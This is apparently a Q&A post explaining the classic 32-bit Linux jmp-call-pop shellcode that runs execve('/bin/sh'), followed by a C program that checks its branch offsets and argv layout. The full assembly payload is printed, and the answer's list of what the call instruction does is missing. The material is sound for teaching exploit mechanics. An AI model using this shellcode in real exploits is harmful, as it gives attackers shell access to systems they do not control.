# AT&T syntax, 32-bit Linux. Labels stand in for the hand-computed offsets
# (jmp 0x2a, call -0x2f) so the listing assembles as-is; the byte counts are
# the sizes each instruction encodes to.
        jmp  to_call              # 2 bytes: EB 2A (the original comment says 3)
to_popl:
        popl %esi                 # 1 byte:  %esi = address of "/bin/sh"
        movl %esi,0x8(%esi)       # 3 bytes: argv[0] = pointer to the string
        movb $0x0,0x7(%esi)       # 4 bytes: NUL-terminate the string
        movl $0x0,0xc(%esi)       # 7 bytes: argv[1] = NULL
        movl $0xb,%eax            # 5 bytes: __NR_execve
        movl %esi,%ebx            # 2 bytes: pathname
        leal 0x8(%esi),%ecx       # 3 bytes: argv
        leal 0xc(%esi),%edx       # 3 bytes: envp
        int  $0x80                # 2 bytes
        movl $0x1, %eax           # 5 bytes: __NR_exit
        movl $0x0, %ebx           # 5 bytes: status 0
        int  $0x80                # 2 bytes
to_call:
        call to_popl              # 5 bytes: call -0x2f, pushes the string's address
        .string "/bin/sh"         # 8 bytes
So jump to call, then “the string's address will be pushed onto the stack as
the return address”. Is it this address that is saved in esi? Is that why pop esi?
This is the common way to write position-independent code (code that can be successfully executed, regardless of what address it is located at).
The call instruction does two things:

So after the call, the address of the string “/bin/sh” is on the stack. The next instruction, pop esi, takes that address off the stack and puts it in the esi register, so it can be used.
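As an added example (not part of the question or the answer above), the C program below resolves the two displacements in the listing against the instruction sizes and walks the jmp, call, popl sequence symbolically: it shows that jmp 0x2a lands exactly on the call, that call -0x2f lands exactly on popl, and that the return address the call pushes, which popl moves into %esi, is the offset of "/bin/sh". It then applies the three stores that follow popl to a constructed copy of the bytes and reports the pathname, argv and envp that execve receives. Assumptions: the sizes are those a 32-bit GNU assembler emits (the jmp is the 2-byte short form EB 2A, not the 3 bytes in the listing's comment), and the load address passed to the functions is an arbitrary constructed value.

```c
#include <stdint.h>
#include <string.h>

/* The listing from the question, one entry per instruction, with the size
 * each one assembles to on 32-bit Linux. The question's comment gives the
 * jmp as 3 bytes; a short jmp is opcode EB plus an 8-bit displacement,
 * so it is 2 (EB 2A). Every other size matches the listing. */
typedef struct { const char *text; int size; } insn_t;

static const insn_t listing[] = {
    { "jmp  0x2a",             2 },  /* EB 2A            */
    { "popl %esi",             1 },  /* 5E               */
    { "movl %esi,0x8(%esi)",   3 },
    { "movb $0x0,0x7(%esi)",   4 },
    { "movl $0x0,0xc(%esi)",   7 },
    { "movl $0xb,%eax",        5 },
    { "movl %esi,%ebx",        2 },
    { "leal 0x8(%esi),%ecx",   3 },
    { "leal 0xc(%esi),%edx",   3 },
    { "int  $0x80",            2 },
    { "movl $0x1,%eax",        5 },
    { "movl $0x0,%ebx",        5 },
    { "int  $0x80",            2 },
    { "call -0x2f",            5 },  /* E8 D1 FF FF FF   */
    { ".string \"/bin/sh\"",   8 },  /* 7 chars plus NUL */
};
enum { I_JMP = 0, I_POPL = 1, I_CALL = 13, I_STR = 14, N_INSN = 15 };

/* Byte offset of instruction i from the first byte of the shellcode
 * (i == N_INSN gives the total length). */
int insn_offset(int i)
{
    int off = 0;
    for (int k = 0; k < i; k++)
        off += listing[k].size;
    return off;
}

/* x86 jmp/call displacements are relative to the END of the branch
 * instruction, i.e. to the address of whatever follows it. */
int branch_target(int i, int disp)
{
    return insn_offset(i) + listing[i].size + disp;
}

/* What `call` pushes as its return address: the byte right after it. */
int call_return_address(int i)
{
    return insn_offset(i) + listing[i].size;
}

/* Walk the jmp -> call -> popl trampoline symbolically with the shellcode
 * loaded at `base` (a constructed value); returns what %esi holds after
 * `popl %esi`, or 0 if a displacement does not land where the trick needs. */
uint32_t esi_after_popl(uint32_t base)
{
    if (branch_target(I_JMP, 0x2a) != insn_offset(I_CALL))
        return 0;                               /* jmp must land on the call */
    if (branch_target(I_CALL, -0x2f) != insn_offset(I_POPL))
        return 0;                               /* call must land on popl */
    return base + call_return_address(I_CALL);  /* popl takes the pushed address */
}

/* Apply the three stores that follow popl to a constructed copy of the
 * bytes around the string and report what execve(2) is handed:
 * %ebx = pathname, %ecx = argv, %edx = envp. */
typedef struct {
    uint32_t pathname, argv, envp;   /* register values at int $0x80 */
    uint32_t argv0, argv1;           /* the two words of the argv array */
    char     path[8];                /* the string %ebx points at */
} execve_view_t;

execve_view_t execve_view(uint32_t base)
{
    uint8_t mem[80] = {0};                 /* constructed: shellcode plus slack after it */
    execve_view_t v;
    memset(&v, 0, sizeof v);
    uint32_t esi = esi_after_popl(base);
    if (esi == 0)
        return v;                          /* trampoline did not resolve */
    uint32_t s = esi - base;               /* offset of "/bin/sh" inside mem */
    memcpy(mem + s, "/bin/sh", 7);
    memcpy(mem + s + 8, &esi, 4);          /* movl %esi,0x8(%esi): argv[0] = "/bin/sh" */
    mem[s + 7] = 0;                        /* movb $0x0,0x7(%esi): terminate the string */
    memset(mem + s + 12, 0, 4);            /* movl $0x0,0xc(%esi): argv[1] = NULL */
    v.pathname = esi;                      /* movl %esi,%ebx */
    v.argv = esi + 8;                      /* leal 0x8(%esi),%ecx */
    v.envp = esi + 12;                     /* leal 0xc(%esi),%edx: envp is that same NULL */
    memcpy(&v.argv0, mem + s + 8, 4);
    memcpy(&v.argv1, mem + s + 12, 4);
    memcpy(v.path, mem + s, 8);
    return v;
}
```

Two things worth noticing from the arithmetic: the string starts 49 bytes in, so %esi points at "/bin/sh" no matter where the 57 bytes were loaded, which is the whole point of the trick; and the two movl stores write to 0x8(%esi) and 0xc(%esi), 8 bytes past the end of the string, so the shellcode only works when it sits in writable memory with room after it (the argv array is built in place, right behind the string).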